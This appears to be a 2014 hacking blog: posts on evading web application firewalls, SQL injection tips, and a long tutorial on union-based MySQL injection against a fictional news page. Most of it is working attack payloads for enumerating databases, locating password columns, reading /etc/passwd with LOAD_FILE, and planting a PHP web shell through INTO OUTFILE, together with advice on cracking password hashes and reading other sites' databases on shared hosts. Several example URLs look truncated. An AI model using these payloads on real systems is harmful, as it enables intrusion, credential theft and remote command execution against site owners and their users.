When white listing is enabled WAFs can be very hard to bypass, if an admin configures bespoke white list rules and applies them to specific parameters it could be impossible to obfuscate the input. In our example we're passing a news_id parameter which is expected to only contain numeric data, if a custom a rule is created to white list numeric data only then injection is impossible.

However custom rules are usually applied to specific parameters, they're stored by the WAF with several properties, a reference to specific paths, the parameter name and a regex rule for what the parameter is allowed to contain. This gives us 2 new attack vectors by obfuscating both the path and the parameter name, if you malform the request in such a way the web server can understand or correct, but the WAF cannot, then you can evade triggering the white list rule to begin with.

Path evasion

In this case the added /notvalid doesn't exist on the server and the web server may process /news/index.php as normal. This depends on your web server and it's version.

URL /*!UNION*/ /*!SELECT*/ 1,group_concat(schema_name),3,4 from information_schema.schemata -- 

You can manipulate paths to break basic string compares by hopping into directories and then back again for example:

URL /*!UNION*/ /*!SELECT*/ 1,group_concat(schema_name),3,4 from information_schema.schemata --

This trick references the news folder, then jumps back a directory and then references the news folder again a second time.

Parameter evasion

Obfuscation of the parameter name may also work so instead of news_id we might use this:

URL /*!UNION*/ /*!SELECT*/ 1,group_concat(schema_name),3,4 from information_schema.schemata --

Or you could supply the same parameters multiple times, in PHP only the last occurrence is used.

URL /*!UNION*/ /*!SELECT*/ 1,group_concat(schema_name),3,4 from information_schema.schemata --

PHP also does a certain amount of cleaning of parameter names, it remove preceding spaces, and converts spaces and periods in the parameter name to underscores, if the parameter name genuinely does contain an underscore such as news_id then this is another good parameter obfuscation, for example:

URL /*!UNION*/ /*!SELECT*/ 1,group_concat(schema_name),3,4 from information_schema.schemata --

If you're dealing with an ASP based server it will remove any URL encoding which is invalid, normally a URL encoded character would be a % followed by 2 hex digits, another method for obfuscating the parameter itself, for example:

URL /*!UNION*/ /*!SELECT*/ 1,group_concat(schema_name),3,4 from information_schema.schemata --

Advanced attacks

Many of the attacks above wont work simply on their own, however combining them together in new an innovative ways can help beat a WAF that can otherwise detect the individual obfuscations, part of being a good hacker is experimenting and persisting.

If you're having trouble bypassing a WAF you could fingerprint the specific type of WAF by looking at behaviour and analyzing error responses, sometimes custom errors will contain the WAF name or hint at version number.

Once you know what you're dealing with check to see if the blacklist rules are publicly available, many of the free WAFs that are commonly in use such as Mod_Security are open source so you can study the blacklist rules directly, look for exceptions and edge cases which you might not otherwise try and be more methodical in your testing.

Lastly you can use applications to help you with attacks such as SQLmap and obfuscaters such as

Thursday, 23 October 2014

SELECT tips,tricks FROM help INTO OUTFILE 'user@localhost'

Some useful tips & tricks while performing SQL injection.

These are a collection of helpful SQLi tips and tricks that might make your life easier when performing SQL injection attacks testing.

Avoid the concat 1024 character limit

In MySQL the group_concat() function has a server imposed limit, the default is 1024 characters. You may run into this limit when enumerating table and column names and certainly when extracting data. Consider the following fictional example taken from State of the Union:

URL UNION SELECT 1,group_concat(table_name),3,4 from information_schema.tables WHERE table_schema = frostyhacksblog --
SELECT id, headline, news, author FROM news WHERE id =-51 UNION SELECT 1,group_concat(table_name),3,4 from information_schema.tables WHERE table_schema = frostyhacksblog --

The result in this case is a list of table names selected from the information_schema, if this list exceeds the group_concat limit it will become truncated on the web page. A simple way to avoid this limit is to select one row at a time, switch the group_concat() for concat() and set a LIMIT at the end, remember that limit is zero indexed so 0 is the first record and 1 is the 2nd and so on. The following example selects the 10th row.

URL UNION SELECT 1,concat(table_name),3,4 from information_schema.tables WHERE table_schema = frostyhacksblog LIMIT 9,1--
SELECT id, headline, news, author FROM news WHERE id =-51 UNION SELECT 1,concat(table_name),3,4 from information_schema.tables WHERE table_schema = frostyhacksblog LIMIT 9,1--

There is a method for selecting an entire table in a single query which I will cover in another blog post covering advanced SQLi techniques.

Illegal mix of collations for operation 'UNION'

You may receive this error when you try and union the original SQL statement with your own data from another table or schema and perform operations like concat() or group_concat(). Collations are rules regarding character sets and how to do operations on them such as order them or compare them you can read more here. When tables store data with different character sets and collations and you try and union these together you will generate this error.

To get around this limitation a simple fix is to run the data you extract through a function which returns a result using the same character set and collation, there are several to pick from hex(), compress(),aes_encrypt(). To make sure you get the result out as plain text you simply run the inverse function on the result for example:


You can also cast or convert the results, you can find the syntax and read more about this in the MySQL documentation.

Find sensitive data quickly

You may want to search quickly for specific data such tables or columns with the name"password" or "admin" in them. Instead of enumerating the entire database and searching through the results you can search the information_schema in a single query to find such columns and which tables they belong to. A fictional example:

URL UNION SELECT 1,group_concat(column_name,0x3a,table_name,0x0a),3,4 from information_schema.columns WHERE column_name like '%pass%' OR column_name like '%admin%'--
SELECT id, headline, news, author FROM news WHERE id =-51 UNION SELECT 1,group_concat(column_name,0x3a,table_name,0x0a),3,4 from information_schema.columns WHERE column_name like '%pass%' OR column_name like '%admin%'--

This will give you a list of results of columns that contain the string "pass" or the string "admin"

Encrypted passwords

In most cases passwords aren't stored in plain text, rather the MD5 is calculated and stored, this is to stop database admins and hackers from easily reading passwords of users or customers. There are many different type of hashes and they are easy to spot, they tend to be a fixed length and random, they may also use a limited character set or have certain static parts such as $P$B at the start, these are different encryption schemes used in newer versions of WordPress and Drupal.

Decrypting MD5 passwords traditionally requires a brute force attempt, you can look at doing this yourself using fast computers and applications like oclHashcat, however there are lots of on line resources that will check hashes for you against a large database of pre-cracked common passwords, the largest of which is Hashkiller.

Base64 encoding

If you come across strange encoding inside fields but the content is variable length (indicating it's not a hash) and tends to end in an = or == then you're looking at Base64 encoded data, the equals or double equals at the end is a dead give away, if the base 64 string length isn't divisible by 3 then the string is padded with either = or ==.

As of MySQL version 5.6.1 you can base64 decode on the server before pulling out the results simply use the FROM_BASE64() function, you can read more about that in the official documentation. If you want to determine the version of the database remember you can select the system variable @@version.

Read from the file system

You can read files directly from the file system with MySQL, only out of directories that the user MySQL is running as is allowed to access, this can be done with the LOAD_FILE() function, you can find the official documentation here:

For example if you wanted to read the Linux password file you'd SELECT LOAD_FILE(‘/etc/passwd’) 

Write to the file system

You can also write to the file system by selecting queries INTO OUTFILE, the documentation can be found here: There are some limitations, your MySQL account you're connected to the database with must have file write privileges and you can only write to system folders which the account the MySQL service runs as has access to

Another trick you can use with MySQL is selecting a column name that is simply a string, the result of this kind of query will simply be the string you used as the column name. For example:

SELECT 'some arbitrary string' FROM SomeRealTable

The output will simply be "some arbitrary string".

A typical use for this is to combine this kind of select with the INTO OUTFILE feature and write some PHP script into a .php file in the web root allowing you to pass commands back to the OS via a web page. Inside of a UNION based SQLi attack it might look something like this:

URL UNION SELECT NULL,"<? system($_GET['cmd']); ?>",NULL,NULL INTO OUTFILE '/var/www/mywebsiteroot/shell.php' --
SELECT id, headline, news, author FROM news WHERE id =-51 UNION SELECT NULL,'<? system($_GET['cmd']); ?>',NULL,NULL INTO OUTFILE '/var/www/mywebsiteroot/shell.php' --

You'll want to set the other columns to NULL so your final file is only contains what you've selected, make sure the first part of the query before the union is not selecting data by setting the where clause to something that doesn't exist, in this case simply setting the id to be a minus does the trick.

Any questions please leave a comment, if you have any suggestions for tips and tricks to expand this post then please comment and I'll give you credit as the source

State of the Union

An in-depth tutorial on union based MySQL injection attacks.

This tutorial will be more in depth than most SQLi tutorials, it is aimed at those who wish to grasp a good understanding of the theory and why certain methods are used, rather than just giving you the smallest number of steps required to start injecting. The information is intended for education purposes only.


Structured Query Language Injection or SQLi for short, is an attack vector which allows an adversary to modify the data access layer of an application, abuse of this vulnerability allows attackers to read the database and in some cases write arbitrary data to the database or even the file system. There are 3 basic types of SQL injection attacks, error based, blind and union, this tutorial will focus on union based attacks, specifically on websites that interact with a MySQL database.

Before starting this tutorial it will be helpful to know at least basic SQL, good hackers understand how systems are used correctly before gaining a deeper understanding of how to break them and find vulnerabilities. If you're completely new to SQL I'd recommend installing MySQL and making a database to test with, follow some tutorials on basic SQL queries until you're comfortable with the basics. MySQL is free and can be downloaded here. There is a near infinite number of resources online to teach you basic MySQL the official reference manual and tutorials are here.

SQL is used in web development to allow for dynamic content, web pages can contain static elements that act as a kind of template and these are filled dynamically with content based on certain conditions. It's the job of the data access layer to build an SQL statement that is used to query the database and fetch the necessary content and insert that content into the static HTML page before delivering it to your browser.

Probably the oldest and most common example of this is a news page, when you click a news article link you're taken to a page that acts as a template for news stories, in the URL a parameter is passed back to the web server which tells the server the ID of the news story to select from the database. There are many other uses for page parameters but for this tutorial we'll focus on a fictional example based off a simple news page. This is an example of our fictional URL selecting a news story with an ID of 51 from the database.

The parameter name is "news_id" and the value is 51, there can be more than one page parameter in the URL separated by the ampersand character, when testing for SQLi vulnerabilities in the real world it's important to test all user input to the page which includes all of the page parameters. Not all websites will be vulnerable, you can only inject websites where the developers have implemented their SQL badly, in many cases SQL injection is impossible.

Our fictional news_id is received by the server and injected inside an SQL statement, the SQL used to query the database in our example could look something like this:

SELECT id, headline, news, author FROM news WHERE id = [Parameter]

This query selects the id, the news headline, the body of the news article and the name of the author from a table called "news" where the id of the news article in the database equals the parameter passed in the page. The various fields are then inserted into the correct place in the HTML template to build the final page before sending it back to the browser.

From now on the URL and SQL statements will be colour coded so that static parts are green and the user supplied content is red, this is just for clarity. For example:

SELECT id, headline, news, author FROM news WHERE id = 51

The basic principle of  SQL injection is to modify the user supplied content such as the page parameters to extend and manipulate the SQL statement to function in a different way. One basic SQLi attack is to simply append OR 1=1 to the page parameter, this causes the final query to look like this:

URL OR 1=1
SELECT id, headline, news, author FROM news WHERE id = 51 OR 1=1

The condition 1=1 always evaluates to TRUE, and because we've OR'd this with our original condition that the id = 51, this statement is always evaluated to true no matter what value of id you use. The means every news record will be selected from the database, instead of the originally intended individual record. By itself there isn't much use for this attack, but it demonstrates the principle by which the attack works so we can move on to more complex examples.


The first step in an SQL injection attack is to determine which page parameters (if any) are vulnerable, the quickest way to do this is to provide a parameter which will cause an SQL error, simply add an apostrophe into the page parameter, if you see an SQL error on the page you know the parameter can be injected, if the page renders as normal then you cannot inject that parameter.

String or integer?

SQL is a strongly typed language which means there's a distinction between data types, generally speaking you'll come across 2 types being used as page parameters, strings and integers. Integers are just whole numbers such as 51 and are written without any additional formatting. Strings can include many different characters and have to be wrapped in apostrophes, sometimes called a single quote, backtick or simply a tick. We've already seen what an SQL query looks like using integers, the following example uses a string to select articles by author name.

SELECT id, author FROM news WHERE author = '[Parameter]' 

The reason this is important is because user input taken as a string can only be injected if you first escape out of the string by including a tick, otherwise any data you inject will simply be considered part of the string. If we attempted to use Bob OR 1=1 we'd have the following statement:

URL OR 1=1
SELECT id, author FROM news WHERE author = 'Bob OR 1=1'

This isn't what we want, SQL is treating the whole input as one string because it's wrapped in apostrophes, so we provide one inside the parameter to escape the input, change the parameter to Bob' OR 1=1 and our query will now look like this:

URL' OR 1=1
SELECT id, author FROM news WHERE author = 'Bob' OR 1=1'

This fixes escaping out of the string, however we have a new problem, we have an additional closing tick at the end of the statement, this will create an invalid SQL query and when queried will cause an SQL error. This is a specific case of a more general problem where you have some additional SQL after the injection point, it is common when doing SQL injection to be injecting into the middle of a statement rather than the end.

To fix this you can attempt to write a clever and complex input that neatly closes off the rest of statement but it's far quicker to comment out the rest of the query after your input, in MySQL you use a double hyphen -- to start a comment which tells the SQL database to ignore everything after. This alone is sufficient when commenting out of an integer input, however a comment after a string input requires --+. The reason the additional + is required is because of an ambiguity with MySQL, -- is used to start a comment but it can also be used as a math operator to decrement an integer. By adding a plus this is URL decoded into a space character and removes the ambiguity, MySQL then treats this operator as the start of a comment as intended. (Thanks to benzi for clarifying this!)

Our input now becomes Bob' OR 1=1 --+ and our final query looks like this:

URL' OR 1=1 --+
SELECT id, author FROM news WHERE author = 'Bob' OR 1=1 --+'

The second step in an SQL injection attack is to determine if the injection point you're testing is a string or an integer, if the website is creating URLs with letters in the page parameters these have to be strings, if the page only generate number you cannot immediately tell, it could be either and you'll have to test. Simply inject with or without a tick and see which throws an SQL error. If you inject 51 OR 1=1 -- and throw an error then they're treating inputs as a string, if it works then they're treating them as an integer.

Just to recap.

Injecting an integer requires no tick and a double hyphen, for example:
51 or 1=1 --

Injecting a string requires a tick to escape the string and a double hyphen and a plus, for example:
51' or 1=1 --+

It's worth noting that all following examples use integers and so do not require a tick, they also don't strictly require comments because there is no SQL after the injection point that will cause an error, however because this is almost never the case in the wild it's good to get used to seeing them in example. During testing there is no real harm in always using them, it's quicker and easier.

How many columns?

The next step is to determine how many columns are being selected from the database by the query we're injecting in to, eventually we'll want to UNION the legitimate data from the original query with our own custom data selected from another table, in order to append these 2 data sets together we need to ensure they have the same number of columns otherwise we'll throw an error.

To determine the number of columns we can expand the query to ORDER the result set by a certain column, MySQL allows you to identify the column you wish to order by using the number of that column. Consider the original query again:

SELECT id, headline, news, author FROM news WHERE id = 51

This query selects 4 columns, in a real attack we wouldn't be able to see the query in the code (unless part of the query is returned by errors) and so we'd be blind to the number of columns it selects, in some cases queries may select * from a table which means all columns and so even if the query is shown inside an SQL error we'd still not know the number of columns.

If we inject 51 ORDER BY 1 -- like this:

SELECT id, headline, news, author FROM news WHERE id = 51 ORDER BY 1 --

The SQL server will order the results by "id" and return the ordered results. If you increase that to 51 ORDER BY 2 -- it will order by "headline", and so on. Eventually you'll reach 51 ORDER BY 5 --, you're now trying to order by a column that doesn't exist in the result set and SQL will throw an error. You can now infer that the data set has 4 columns, 1 column less than the number which caused the error.

Note that if you keep increasing your number of columns and there appears to be no sensible number that creates an error, you have probably incorrectly identified if the page parameter is a string or an integer, you need to double check if you need a tick or not.

We're now ready to union the data from the original query with our own. To start with we simply union select with a row of numbers which is equal in length to the number of columns we've previously determined. If we keep with our original example we need to inject 51 UNION SELECT 1,2,3,4 -- this will make our query look like this:

SELECT id, headline, news, author FROM news WHERE id = 51 UNION SELECT 1,2,3,4 --

This appends our row of data (1,2,3,4) on to the results, in many cases this will not show visibly on the website. Some web pages are designed to only use 1 row from the data set, if the data set contains multiple rows it will simply use the first. In this case our appended data would be ignored. Sometimes pages are designed to loop through all rows and display each in turn, in which case you'll see some of the numbers in our row of data actually appear on the web page somewhere, this could be as text or they could be used as part of the HTML markup, if you cannot see any of the numbers 1,2,3,4 on the page it's always worth checking the source code.

In our example only the first row is used, we can fix this problem and make our appended data be the first result by forcing the original part of the query returns 0 rows, we do this by making the criteria in the WHERE clause impossible to be met, usually the simplest way is to add a minus character for example:

SELECT id, headline, news, author FROM news WHERE id = -51 UNION SELECT 1,2,3,4 --

Now instead of seeing normal data on the page such as a news headline, an author and the body of the article, you'll see some of the numbers from our row of data. This allows you to determine which columns in the select statement are being inserted somewhere in the HTML, only these can be used to extract data. In this fictional example you'd see "2" in place of the headline, "3" in place of the news story and "4" in place of the author, however you wouldn't see 1 anywhere, id was selected from the database but never displayed on the page, this means we can use column 2, 3 or 4 to query data.

Finally we can start selecting real data from the database, let's do a test and select the version number of the database to know what we're dealing with, this is helpful information as we can research what features the server supports and make sure we don't issue any SQL queries that it cannot understand. To do this simply replace one of the injectable columns with the system variable @@version, lets pick column 2: 

URL UNION SELECT 1,@@version,3,4 --
SELECT id, headline, news, author FROM news WHERE id = -51 UNION SELECT 1,@@version,3,4 --

Instead of a headline on the page you'll have the version number of the SQL database!

Enumerating schemas

Before we can select data from the database we need to know the structure, what schemas are available, the name of the tables they contain and the name of the columns in the tables, the logical place to start is top down starting with is the schemas.

As of version 5 of MySQL they have included a hidden schema called "information_schema", this schema contains all the meta data about the rest of the database and is maintained by the MySQL server, it has a fixed structure which means we already know what tables to query. You can find more about the information_schema structure here.

In order to find what other schemas are on the server and their names we read from a table called "schemata" and a column called "schema_name", keeping with our original query we expand our union select by setting our page parameter to:

URL UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata --
SELECT id, headline, news, author FROM news WHERE id = -51 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata --

Let's break down what this means, we're again replacing column 2 but this time with a concatenation of all the rows in the table, selecting only the column "schema_name". Remember that we have to concatenate the many results it could return into a single string because we're selecting data into a single column of a larger set of results, this saves us from having to query one row at a time.

Note that we're selecting from the table "schemata" from inside the schema called "information_schema", we cannot just reference the table by name alone unless the schema we're selecting from is set as the default schema, the information_schema is never set as the default so we have to use the format schema.table

If you've done this correctly, you'll get a comma separated list of all the schemas on the server, including the default information_schema, make a list of these they're important. If you wish to know which of these schemas is the default schema simply select database() for example:

URL UNION SELECT 1,database(),3,4 --
SELECT id, headline, news, author FROM news WHERE id = -51 
UNION SELECT 1,database(),3,4 --

For our example lets assume there's only one additional schema called "frostyhacksblog" which is the default schema, there may be more. If you happen to get an extremely long list of schemas you may have hit the SQLi jackpot which is a hosting provider that shares a database among many websites, each with their own schema, if this has been set up with bad security you'll be able to read the database of a completely different website. It's possible the websites are also hosted on the same web server with the same IP address, you can use a reverse DNS lookup tool such as IPNeighbour to find what other websites these schemas might belong to.

Now we know the schema names we can enumerate the tables within them.

Enumerating tables

This works the same as enumerating schemas, we're selecting meta data about the database from the information_schema, this time from a table called "tables" so our target table name will be "information_schema.tables" and the column name is "table_name", we also want to specify what schema we want to select the list of tables from with the WHERE condition that the column "table_schema" contains our schema name, in our example this is frostyhacksblog. For example:

URL UNION SELECT 1,group_concat(table_name),3,4 from information_schema.tables WHERE table_schema = frostyhacksblog --
SELECT id, headline, news, author FROM news WHERE id =-51 UNION SELECT 1,group_concat(table_name),3,4 from information_schema.tables WHERE table_schema = frostyhacksblog --

However there's problem using this, it will throw an error, under certain circumstances you may not be able to use the name of the schema as text, to solve this problem you'll have to hex encode the name. MySQL understands hex representations of values by preceding them with 0x and then the hex value.

You can use a free hex converter to convert values, the result of the conversion of frostyhacksblog is 66726f7374796861636b73626c6f67 and so the full hex representation becomes 0x66726f7374796861636b73626c6f67

Our query now looks like this:

URL UNION SELECT 1,group_concat(table_name),3,4 from information_schema.tables WHERE table_schema = 0x66726f7374796861636b73626c6f67 --
SELECT id, headline, news, author FROM news WHERE id = -51 UNION SELECT 1,group_concat(table_name),3,4 from information_schema.tables WHERE table_schema = 0x66726f7374796861636b73626c6f67 --

If this executes correctly you'll get a list of tables separated by commas. It's worth noting that you may get a truncated list as the group_concat function has a limit set by the SQL server, the default limit is 1024 characters. There's more advanced ways to get around this limit but while you're learning the basics you can swap group_concat(table_name) for concat(table_name) which will return a single result, them use the LIMIT function to select the specific row you want, if you want row 20 you would use LIMIT 19,1 the final query would look like this:

URL UNION SELECT 1,concat(table_name),3,4 from information_schema.tables WHERE table_schema = 0x66726f7374796861636b73626c6f67 LIMIT 20,1--
SELECT id, headline, news, author FROM news WHERE id = -51 UNION SELECT 1,concat(table_name),3,4 from information_schema.tables WHERE table_schema = 0x66726f7374796861636b73626c6f67 LIMIT 20,1--

Remember that LIMIT is zero indexed, this means the first row is not 1 but 0, and so the 20th row would be 19, not 20. You can now enumerate all the tables, make a note of their names and what schema they're a part of.

Enumerating columns

Just like with schemas and tables we enumerate columns in a similar way, we read from a table called "columns" from the "information_schema" schema, and we select a field called "column_name", we switch the condition to be which table we're interested in. For example if we're interested in a table called "news" we'd first hex encode it to 0x6e657773 and then use the input:

URL UNION SELECT 1,group_concat(column_name),3,4 from information_schema.columns WHERE table_name = 0x6e657773 --
SELECT id, headline, news, author FROM news WHERE id = -51 UNION SELECT 1,group_concat(column_name),3,4 from information_schema.columns WHERE table_name = 0x6e657773 --

This gives us a comma separated list of columns that exist in the table you picked. We now know the schemas, the tables and the columns and that's enough information to select the data we need.

Selecting data

Selecting the data you want is straight forward, it follows the same format as above, if you're selecting from the default schema (the one that database() returns) then you can reference the table by itself otherwise use schema.table format, there's no need to hex encode anything this time. Our input becomes

URL UNION SELECT 1,group_concat(column1,column2,column3),3,4 from schema.table -- 
SELECT id, headline, news, author FROM news WHERE id = -51 UNION SELECT 1,group_concat(column1,column2,column3),3,4 from schema.table -- 

When selecting multiple columns the result will appended together, only the rows of results will be separated by commas, not the columns. To make the output more readable you can add additional characters to separate columns apart, you just need to  hex encode them, it's common to separate columns by colons (0x3a) and add a new line (0x0a) to the end, for example:

URL UNION SELECT 1,group_concat(column1,0x3a,column2,0x3a,column3,0x0a),3,4 from schema.table --
SELECT id, headline, news, author FROM news WHERE id = -51 UNION SELECT 1,group_concat(column1,0x3a,column2,0x3a,column3,0x0a),3,4 from schema.table --

If we wanted to select data from our news table example we could select the news headline and news body like so:

URL UNION SELECT 1,group_concat(headline,0x3a,news,0x0a),3,4 from --
SELECT id, headline, news, author FROM news WHERE id = -51 UNION SELECT 1,group_concat(headline,0x3a,news,0x0a),3,4 from --

This is kind of pointless since this content is already displayed to the news page, but it's only an example. You could select any other data from any other schema and table that web application has permissions to read, that might include other sensitive data such as a list of logins/passwords to the website, user data etc.

If you have any questions please post a comment and I'll be glad to help, please refrain from posting real world examples as they will just be deleted. Keep in mind that it's against the law to perform SQL injection on websites which you do not own or have explicit permission to test.